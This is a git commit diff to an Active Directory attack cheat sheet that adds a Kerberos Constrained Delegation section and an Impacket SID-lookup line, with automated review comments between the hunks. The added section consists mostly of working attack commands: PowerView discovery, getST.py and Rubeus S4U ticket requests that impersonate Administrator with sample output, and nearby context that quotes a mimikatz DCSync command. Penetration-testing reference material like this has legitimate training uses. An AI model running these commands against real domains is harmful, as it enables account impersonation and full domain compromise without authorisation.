Kerberos Constrained Delegation

patch-1
Swissky 2020-02-23 21:20:46 +01:00
parent c5ac4e9eff
commit 74f2dfccca
1 changed files with 33 additions and 1 deletions


@ -49,6 +49,7 @@
- [Trust relationship between domains](#trust-relationship-between-domains) - [Trust relationship between domains](#trust-relationship-between-domains)
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
- [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation) - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
- [Kerberos Constrained Delegation](#kerberos-constrained-delegation)
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation) - [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
- [Relay delegation with mitm6](#relay-delegation-with-mitm6) - [Relay delegation with mitm6](#relay-delegation-with-mitm6)
- [PrivExchange attack](#privexchange-attack) - [PrivExchange attack](#privexchange-attack)
@ -1089,6 +1090,9 @@ Prerequisite:
```powershell ```powershell
$ Convert-NameToSid target.domain.com\krbtgt $ Convert-NameToSid target.domain.com\krbtgt
S-1-5-21-2941561648-383941485-1389968811-502 S-1-5-21-2941561648-383941485-1389968811-502
# with Impacket
lookupsid.py domain/user:password@10.10.10.10
``` ```
- Replace 502 with 519 to represent Enterprise Admins - Replace 502 with 519 to represent Enterprise Admins
- Create golden ticket and attack parent domain. - Create golden ticket and attack parent domain.
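Review bot: the added `lookupsid.py domain/user:password@10.10.10.10` line has no expected-output line, unlike the `Convert-NameToSid` example directly above it, so the reader is not told that `lookupsid.py` prints the domain SID followed by a list of RIDs rather than one krbtgt SID; suggest a comment such as `# domain SID is printed first; krbtgt is RID 502` so the following bullet ("Replace 502 with 519 to represent Enterprise Admins") still reads correctly for the Impacket path. Also, the line sits in a fence tagged `powershell` next to a `$`-prefixed PowerShell command, so note that `lookupsid.py` is run from the attacker's Impacket host, not from a PowerShell session.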
@ -1098,7 +1102,7 @@ Prerequisite:
### Kerberos Unconstrained Delegation ### Kerberos Unconstrained Delegation
> The user sends a TGS to access the service, along with their TGT, and then the service can use the users TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html > The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
Domain Compromise via DC Print Server and Unconstrained Delegation Domain Compromise via DC Print Server and Unconstrained Delegation
@ -1163,6 +1167,34 @@ Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HA
* Ensure sensitive accounts cannot be delegated * Ensure sensitive accounts cannot be delegated
* Disable the Print Spooler Service * Disable the Print Spooler Service
### Kerberos Constrained Delegation
> Request a Kerberos ticket which allows us to exploit delegation configurations, we can once again use Impackets getST.py script, however,
Passing the -impersonate flag and specifying the user we wish to impersonate (any valid username).
```powershell
# Discover
$ Get-DomainComputer -TrustedToAuth | select -exp dnshostname
# Find the service
$ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
# Exploit with Impacket
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
# Exploit with Rubeus
$ rubeus s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
```
### Kerberos Resource Based Constrained Delegation ### Kerberos Resource Based Constrained Delegation
Resource-based Constrained Delegation was introduced in Windows Server 2012. Resource-based Constrained Delegation was introduced in Windows Server 2012.
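Review bot: the new blockquote ("Request a Kerberos ticket which allows us to exploit delegation configurations, we can once again use Impackets getST.py script, however, Passing the -impersonate flag ...") is quoted with `>` but carries no source link, whereas the quote in the Unconstrained Delegation section above cites shenaniganslabs.io; either add the citation or rewrite it as plain prose, and fix the sentence while doing so (it is a run-on with a stray capitalised "Passing", and "Impackets" should be "Impacket's"). In the code block, `Get-DomainComputer previous_result` would be clearer as `Get-DomainComputer -Identity <hostname from previous command>` since `previous_result` is a placeholder, not a real argument. The `getST.py` example targets `HOST/SQL01.DOMAIN` while the Rubeus example targets `cifs/srv01.domain.com`; a one-line comment that `-spn` / `/msdsspn` must be one of the SPNs listed in `msds-AllowedToDelegateTo` from the discovery step would tie the three commands together. Finally, the preceding Unconstrained Delegation section ends with a mitigations list (`* Ensure sensitive accounts cannot be delegated`, `* Disable the Print Spooler Service`); this section has none, so consider adding the equivalent bullets for constrained delegation, e.g. marking privileged accounts "Account is sensitive and cannot be delegated" or placing them in the Protected Users group, and auditing which computers have `TrustedToAuth` set.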